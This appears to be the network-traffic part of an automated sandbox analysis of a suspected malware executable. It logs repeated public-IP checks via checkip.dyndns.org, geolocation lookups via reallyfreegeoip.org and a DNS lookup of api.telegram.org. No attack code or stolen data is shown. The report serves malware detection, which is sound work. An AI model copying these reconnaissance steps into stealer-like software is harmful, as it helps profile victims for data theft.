Sep 27, 2024 12:54:30.541208029 CEST	1.1.1.1	192.168.2.7	0xefef	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49702	193.122.130.0	80	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 12:52:08.942128897 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 27, 2024 12:52:09.404691935 CEST	320	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 10:52:09 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 21f714d99d490fc94e1bed1f364d6fbf Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 27, 2024 12:52:09.419301987 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 27, 2024 12:52:09.520695925 CEST	320	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 10:52:09 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 87083e1396d49bed82f4596ea53a0d95 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 27, 2024 12:52:10.619218111 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 27, 2024 12:52:10.720978975 CEST	320	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 10:52:10 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 7992b19688aebb494bdbbe7ba3044fc9 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49705	193.122.130.0	80	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 12:52:11.827440023 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 27, 2024 12:52:12.413592100 CEST	320	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 10:52:12 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 9370436a0c2301987ae4202734c082a5 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49708	193.122.130.0	80	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 12:52:13.177370071 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Sep 27, 2024 12:52:14.021292925 CEST	320	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 10:52:13 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: effeaec1971239e865b042e835f03f42 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49711	193.122.130.0	80	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 12:52:14.804182053 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 27, 2024 12:52:15.339409113 CEST	320	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 10:52:15 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: c519690e8cf5427967fa11202fc3a7ed Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49713	193.122.130.0	80	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 12:52:16.181303978 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 27, 2024 12:52:16.761796951 CEST	320	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 10:52:16 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2534f24c4e2b56ef84cdbeb1b06d3bdc Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49715	193.122.130.0	80	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 12:52:17.570626020 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 27, 2024 12:52:18.063410044 CEST	320	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 10:52:18 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: d67f81f99c3cba25603984cab79c9d1d Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49717	193.122.130.0	80	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 12:52:18.884442091 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Sep 27, 2024 12:52:19.780775070 CEST	320	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 10:52:19 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2189fe081a190c87c87df95699fb4198 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49703	188.114.96.3	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:52:10 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-27 10:52:10 UTC	675	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 10:52:10 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 8886 Last-Modified: Fri, 27 Sep 2024 08:24:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f0hMrb9p8uF9v02r73V0bxKHjyhb3yL618UL1pwQc8ZeWSXHHRARVJ3KaA5YZd1NhhnVZy4TZfag8MRO%2FXRSKApWBTfQTGI6tHCKD%2FQMKapWvTWDhaf%2BGnaG4C2lCNTHFuEgumcN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c9af1559a6842bf-EWR
2024-09-27 10:52:10 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-27 10:52:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49704	188.114.96.3	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:52:11 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-09-27 10:52:11 UTC	679	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 10:52:11 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 8887 Last-Modified: Fri, 27 Sep 2024 08:24:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g96cboqL9%2ByGRp5NMLNmdAJBb1aG3lLffq2X7TR0XOWeZnmEXxMPiu%2BDyBttDW4HxvPE%2FamVIh5F%2BYF0jchyqS4uZgEqf7U%2FOu3xWVlxORf9z8txijdehcBZH8tZ1mN55gocvoW7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c9af15aaf3c4368-EWR
2024-09-27 10:52:11 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-27 10:52:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49707	188.114.96.3	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:52:13 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-27 10:52:13 UTC	675	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 10:52:13 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 8889 Last-Modified: Fri, 27 Sep 2024 08:24:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BUtmlNjObyxH7R1rufvg2s%2F%2FjX4NAz4a4LnEASYKb6Qn9fgeZA4Fen1C5kr0vAzmzH3xUujA7vL93N8DnM3uh8zkY8jEfKBAcHbpnBbZ18bRRnfq3jqNj74w6mfScll%2Bf5LFegXp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c9af165bac74314-EWR
2024-09-27 10:52:13 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-27 10:52:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49710	188.114.96.3	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:52:14 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-27 10:52:14 UTC	677	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 10:52:14 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 8890 Last-Modified: Fri, 27 Sep 2024 08:24:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DpRP%2B7jlfiexrtXO9ZNXEmw6jl5MjB%2FcpfOQePylo3E9WwlsvDerkBt%2FlrP6KdZN0sCSeO1H5gJh0RTD7VVRYZ%2FqDCFbGxJc5GEkjVxBF5pOxm9cQpmbugu6UVeTaVBjMYLMbFK3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c9af16fbab17ced-EWR
2024-09-27 10:52:14 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-27 10:52:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49712	188.114.96.3	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:52:15 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-27 10:52:16 UTC	671	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 10:52:16 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 8892 Last-Modified: Fri, 27 Sep 2024 08:24:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Lv6ZH1S8XU6FkIz911kTmVYZ09QiBWdR0QCztdjBJCA7t9Zd4bJ41lysBioNGnNQLteM4ABEWD2FfN%2BxzJLne6BbohLmkjMONBXWkKPfUn0z3TAjalF3tqfz4Nsr1iQrXMFJkJhZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c9af1781dbe7ca8-EWR
2024-09-27 10:52:16 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-27 10:52:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49714	188.114.96.3	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:52:17 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-09-27 10:52:17 UTC	679	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 10:52:17 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 8893 Last-Modified: Fri, 27 Sep 2024 08:24:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xq9fHTfcJWwtpMSV59kKTuh4SMszUt9JtxRpQag7XWeyXVoHYyDVyRyCuwY8qFqLXg%2BDKn0%2FiYnh6UfvR3VZSrhRD9ayOl%2FW4KUdJqcEWocbITM0dGyP%2Bx0%2FAzgnBDSayus107FR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c9af180df510c86-EWR
2024-09-27 10:52:17 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-09-27 10:52:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49716	188.114.96.3	443	1424	C:\Users\user\Desktop\.05.2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-27 10:52:18 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
